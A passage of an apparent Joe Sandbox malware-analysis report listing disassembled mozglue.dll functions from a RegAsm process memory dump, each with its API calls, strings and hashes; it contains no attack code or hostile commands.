                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                                    • String ID:
                                                                                    • API String ID: 4244350000-0
                                                                                    • Opcode ID: ee20ec3034c74f4fcf6042a7a0e46966e6cbd12c73fbbbe31c781b201a929a02
                                                                                    • Instruction ID: c9755b580e49071d1329a37e6ec8215303deace2f09e640ad455ab2b9741be53
                                                                                    • Opcode Fuzzy Hash: ee20ec3034c74f4fcf6042a7a0e46966e6cbd12c73fbbbe31c781b201a929a02
                                                                                    • Instruction Fuzzy Hash: 9A210571B002059BDB009F68CC40BAEBBB9FF86308F684129E818DB341E736D911CBA5
                                                                                    Function 6C6CB7A0 Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C6CB7CF
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C6CB808
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C6CB82C
                                                                                    • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6CB840
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6CB849
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
                                                                                    • String ID:
                                                                                    • API String ID: 1977084945-0
                                                                                    • Opcode ID: ee81c30a69717da16b070d8c6ad43eb7d0325330b8d12ebcc0d40ed6c52a6cd4
                                                                                    • Instruction ID: 5b6f275b27a1f57b663b43de6022516fcba299ce21010f3a6f1413a2b72a3d62
                                                                                    • Opcode Fuzzy Hash: ee81c30a69717da16b070d8c6ad43eb7d0325330b8d12ebcc0d40ed6c52a6cd4
                                                                                    • Instruction Fuzzy Hash: 50213DB1E002199FDF04DFA9D8855FEBBB4EF89318F14812AEC15A7341E731A944CBA5
                                                                                    Function 6C726E50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C726E78
                                                                                      • Part of subcall function 6C726A10: InitializeCriticalSection.KERNEL32(6C74F618), ref: 6C726A68
                                                                                      • Part of subcall function 6C726A10: GetCurrentProcess.KERNEL32 ref: 6C726A7D
                                                                                      • Part of subcall function 6C726A10: GetCurrentProcess.KERNEL32 ref: 6C726AA1
                                                                                      • Part of subcall function 6C726A10: EnterCriticalSection.KERNEL32(6C74F618), ref: 6C726AAE
                                                                                      • Part of subcall function 6C726A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C726AE1
                                                                                      • Part of subcall function 6C726A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C726B15
                                                                                      • Part of subcall function 6C726A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C726B65
                                                                                      • Part of subcall function 6C726A10: LeaveCriticalSection.KERNEL32(6C74F618,?,?), ref: 6C726B83
                                                                                    • MozFormatCodeAddress.MOZGLUE ref: 6C726EC1
                                                                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C726EE1
                                                                                    • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C726EED
                                                                                    • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C726EFF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
                                                                                    • String ID:
                                                                                    • API String ID: 4058739482-0
                                                                                    • Opcode ID: d1f641b76183b913c99e0d5f2766b557bb0719e987e7e8e8c7ac082311f23ab1
                                                                                    • Instruction ID: e26eb2a9bb122376d3ff4282539dd8062f7415e6959ea053dbb7185ce84d5ba4
                                                                                    • Opcode Fuzzy Hash: d1f641b76183b913c99e0d5f2766b557bb0719e987e7e8e8c7ac082311f23ab1
                                                                                    • Instruction Fuzzy Hash: 2921C4B1A042198FCF10DF69D98569E77F5FF84308F04803AE80D97240EB74AA488F92
                                                                                    Function 6C700D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C6C3DEF), ref: 6C700D71
                                                                                    • VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C6C3DEF), ref: 6C700D84
                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C6C3DEF), ref: 6C700DAF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual$Free$Alloc
                                                                                    • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                    • API String ID: 1852963964-2186867486
                                                                                    • Opcode ID: d1c84adde142c374d1cc9591190f304c5b5eaf98738ce879be261c5eb51ecde0
                                                                                    • Instruction ID: 464f273b0dca7ccfbf64b5ebd907e0368ba4fe326ae45b22571bbf57de35fa8e
                                                                                    • Opcode Fuzzy Hash: d1c84adde142c374d1cc9591190f304c5b5eaf98738ce879be261c5eb51ecde0
                                                                                    • Instruction Fuzzy Hash: F6F089B138079423E62429665E0BF6A279D67C2B75F34C036F608DA9C0DA64F814D7B5
                                                                                    Function 6C725850 Relevance: 7.5, APIs: 5, Instructions: 41synchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(000000FF), ref: 6C72586C
                                                                                    • CloseHandle.KERNEL32 ref: 6C725878
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C725898
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C7258C9
                                                                                    • free.MOZGLUE(00000000), ref: 6C7258D3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$CloseHandleObjectSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 1910681409-0
                                                                                    • Opcode ID: d244c14abc6a5cb3a05d0c30d6b71c30c91327ae13202030481fb22903b9564f
                                                                                    • Instruction ID: 844e28e6ed3f74bf85a46ea5d02ae71e8ed51cef695f58fd17849e14626a5d88
                                                                                    • Opcode Fuzzy Hash: d244c14abc6a5cb3a05d0c30d6b71c30c91327ae13202030481fb22903b9564f
                                                                                    • Instruction Fuzzy Hash: 4D011D717042019BDF00FF2AED08A16BBB9EB9332E724C177E51AD2610E77598158F95
                                                                                    Function 6C717620 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C7175C4,?), ref: 6C71762B
                                                                                      • Part of subcall function 6C6DCA10: malloc.MOZGLUE(?), ref: 6C6DCA26
                                                                                    • InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C7174D7,6C7215FC,?,?,?), ref: 6C717644
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71765A
                                                                                    • AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C7174D7,6C7215FC,?,?,?), ref: 6C717663
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C7174D7,6C7215FC,?,?,?), ref: 6C717677
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
                                                                                    • String ID:
                                                                                    • API String ID: 418114769-0
                                                                                    • Opcode ID: 33d72232222413bf85af49d28af20d6a8b62051eb50ad97bc9d416b13b4ae7c9
                                                                                    • Instruction ID: 680a5d7e3c56058007e82c6ce8b95cdcd86944576c743033b1f8ecce5c9a6df5
                                                                                    • Opcode Fuzzy Hash: 33d72232222413bf85af49d28af20d6a8b62051eb50ad97bc9d416b13b4ae7c9
                                                                                    • Instruction Fuzzy Hash: CBF08171E10755ABD7009F61C848A69B778FFEA259F118366F90542601E7B0B9D08BD0
                                                                                    Function 6C721700 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C721800
                                                                                      • Part of subcall function 6C6FCBE8: GetCurrentProcess.KERNEL32(?,6C6C31A7), ref: 6C6FCBF1
                                                                                      • Part of subcall function 6C6FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6C31A7), ref: 6C6FCBFA
                                                                                      • Part of subcall function 6C6C4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C703EBD,6C703EBD,00000000), ref: 6C6C42A9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentInit_thread_footerTerminatestrlen
                                                                                    • String ID: Details$name${marker.name} - {marker.data.name}
                                                                                    • API String ID: 46770647-1733325692
                                                                                    • Opcode ID: 262a80ced137c202e2816f8c9dca25bceb0c7c5138d74f477d917a41c338933d
                                                                                    • Instruction ID: 348ce94d34513a9b772b643b543b7f72662c499d4c32a51bf0a97daa8c5578c2
                                                                                    • Opcode Fuzzy Hash: 262a80ced137c202e2816f8c9dca25bceb0c7c5138d74f477d917a41c338933d
                                                                                    • Instruction Fuzzy Hash: D3711570A0074A9FCB04DF28D5447AAFBB2FF86314F008669D8154BB41D775EA99CBE2
                                                                                    Function 6C72B0C0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 188COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • free.MOZGLUE(?,?,6C72B0A6,6C72B0A6,?,6C72AF67,?,00000010,?,6C72AF67,?,00000010,00000000,?,?,6C72AB1F), ref: 6C72B1F2
                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,6C72B0A6,6C72B0A6,?,6C72AF67,?,00000010,?,6C72AF67,?,00000010,00000000,?), ref: 6C72B1FF
                                                                                    • free.MOZGLUE(?,?,?,map/set<T> too long,?,?,6C72B0A6,6C72B0A6,?,6C72AF67,?,00000010,?,6C72AF67,?,00000010), ref: 6C72B25F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$Xlength_error@std@@
                                                                                    • String ID: map/set<T> too long
                                                                                    • API String ID: 1922495194-1285458680
                                                                                    • Opcode ID: cbbbafd3cd44b9e198273cb174c70544af17eb8c432c107c3fafc235b6d441a7
                                                                                    • Instruction ID: 74599210327443b1cfb64ee186aca129981b482b7adf73b3ea4c541935591ace
                                                                                    • Opcode Fuzzy Hash: cbbbafd3cd44b9e198273cb174c70544af17eb8c432c107c3fafc235b6d441a7
                                                                                    • Instruction Fuzzy Hash: DD617C746042458FD701CF19CA84A9ABBF1FF4A358F28C5A9D85A4BB52C335FC45CB91
                                                                                    Function 6C6ED468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6C6FCBE8: GetCurrentProcess.KERNEL32(?,6C6C31A7), ref: 6C6FCBF1
                                                                                      • Part of subcall function 6C6FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6C31A7), ref: 6C6FCBFA
                                                                                    • EnterCriticalSection.KERNEL32(6C74E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C6FD1C5), ref: 6C6ED4F2
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C6FD1C5), ref: 6C6ED50B
                                                                                      • Part of subcall function 6C6CCFE0: EnterCriticalSection.KERNEL32(6C74E784), ref: 6C6CCFF6
                                                                                      • Part of subcall function 6C6CCFE0: LeaveCriticalSection.KERNEL32(6C74E784), ref: 6C6CD026
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C6FD1C5), ref: 6C6ED52E
                                                                                    • EnterCriticalSection.KERNEL32(6C74E7DC), ref: 6C6ED690
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C6FD1C5), ref: 6C6ED751
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                                    • String ID: MOZ_CRASH()
                                                                                    • API String ID: 3805649505-2608361144
                                                                                    • Opcode ID: 8e9944c125181f07bd3cef4963bffaf755f6532d116d5d33f8ed8053c3628785
                                                                                    • Instruction ID: f8dfcdb6c0c9124f8204fede347de4e13d629b2ea549737895652aa071a92685
                                                                                    • Opcode Fuzzy Hash: 8e9944c125181f07bd3cef4963bffaf755f6532d116d5d33f8ed8053c3628785
                                                                                    • Instruction Fuzzy Hash: F251F171A097058FD324CF29C19061AB7E6EBCA318F24893FD5AAC7B84D770E804CB95
                                                                                    Function 6C714630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldiv
                                                                                    • String ID: -%llu$.$profiler-paused
                                                                                    • API String ID: 3732870572-2661126502
                                                                                    • Opcode ID: 7fd95820604ffee36b30800959998a0b67718223721a03d7e407b46b96572337
                                                                                    • Instruction ID: 10cbef348e72db38daac13425e274e09b2c477a1f78bb3c79c7e54034d82fb4a
                                                                                    • Opcode Fuzzy Hash: 7fd95820604ffee36b30800959998a0b67718223721a03d7e407b46b96572337
                                                                                    • Instruction Fuzzy Hash: 4C418971F087089BCB08DF78D95119EBBF6EF85358F14863EE859ABB81EB3098048745
                                                                                    Function 6C739830 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C73985D
                                                                                    • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C73987D
                                                                                    • MOZ_CrashPrintf.MOZGLUE(ElementAt(aIndex = %zu, aLength = %zu),?,?), ref: 6C7398DE
                                                                                    Strings
                                                                                    • ElementAt(aIndex = %zu, aLength = %zu), xrefs: 6C7398D9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Printf$Target@mozilla@@$?vprint@Crash
                                                                                    • String ID: ElementAt(aIndex = %zu, aLength = %zu)
                                                                                    • API String ID: 1778083764-3290996778
                                                                                    • Opcode ID: 1a74ebbba58c57f8867b21f39de57aaf5ba9b986a727d699029d392f97258c37
                                                                                    • Instruction ID: 1257a504d3f9ee88bc99b7b5e19141582062289b4ef1a1825be9f2e852f0b032
                                                                                    • Opcode Fuzzy Hash: 1a74ebbba58c57f8867b21f39de57aaf5ba9b986a727d699029d392f97258c37
                                                                                    • Instruction Fuzzy Hash: D3310575B0010CAFDB14AF59D8449EF77A9DF89318F10802DEA2A9BB41CB7159098BE9
                                                                                    Function 6C7146E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __aulldiv.LIBCMT ref: 6C714721
                                                                                      • Part of subcall function 6C6C4410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C703EBD,00000017,?,00000000,?,6C703EBD,?,?,6C6C42D2), ref: 6C6C4444
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldiv__stdio_common_vsprintf
                                                                                    • String ID: -%llu$.$profiler-paused
                                                                                    • API String ID: 680628322-2661126502
                                                                                    • Opcode ID: a644ff982a21b99a27480cc9e0fdbd88a573ffb5951427bc0e4febeddf92b4b4
                                                                                    • Instruction ID: 0059e578450a9a2ce02a7ec7d1b40dea8b3309ec5099e32955ae5598cbeb2c5e
                                                                                    • Opcode Fuzzy Hash: a644ff982a21b99a27480cc9e0fdbd88a573ffb5951427bc0e4febeddf92b4b4
                                                                                    • Instruction Fuzzy Hash: 21315C71F042085BCB0CDF7DD98129EBBE6DB89328F18853EE8059BB41EB70D9048B94
                                                                                    Function 6C71B410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6C6C4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C703EBD,6C703EBD,00000000), ref: 6C6C42A9
                                                                                    • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C71B127), ref: 6C71B463
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C71B4C9
                                                                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C71B4E4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: _getpidstrlenstrncmptolower
                                                                                    • String ID: pid:
                                                                                    • API String ID: 1720406129-3403741246
                                                                                    • Opcode ID: d9b846a789feb6194a0216b8d1d64fee9029c5651c33125ab9a41b4bd894d5b2
                                                                                    • Instruction ID: 3f921d764d99434b6f42390521a2635bef473f6d4232093c2f4e7c84d749cdfa
                                                                                    • Opcode Fuzzy Hash: d9b846a789feb6194a0216b8d1d64fee9029c5651c33125ab9a41b4bd894d5b2
                                                                                    • Instruction Fuzzy Hash: D63113B1A052088BDB00DFAAD980AAEB7B5FF45318F58452DD821A7F41D731B849CBA1
                                                                                    Function 6C6DBF00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C727A3F), ref: 6C6DBF11
                                                                                    • ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C727A3F), ref: 6C6DBF5D
                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C727A3F), ref: 6C6DBF7E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@?init@?$basic_ios@D@std@@@2@_V?$basic_streambuf@
                                                                                    • String ID: sl
                                                                                    • API String ID: 4279176481-3563831378
                                                                                    • Opcode ID: edf3dd4ea2f0c695aa753972fe6840c9f5fbe3678dd1ce8e2e07a8ad0f42d17c
                                                                                    • Instruction ID: 07ea320996f3b56c4a15d151559d330e2c1e70a9be3b5974483fb4ef0dc6d42a
                                                                                    • Opcode Fuzzy Hash: edf3dd4ea2f0c695aa753972fe6840c9f5fbe3678dd1ce8e2e07a8ad0f42d17c
                                                                                    • Instruction Fuzzy Hash: 7711B2792016148FC725CF1CD69996AFBF8FB5930831588ADE98A8B751C731BC00CF90
                                                                                    Function 6C6CF100 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(shell32,?,6C73D020), ref: 6C6CF122
                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C6CF132
                                                                                    Strings
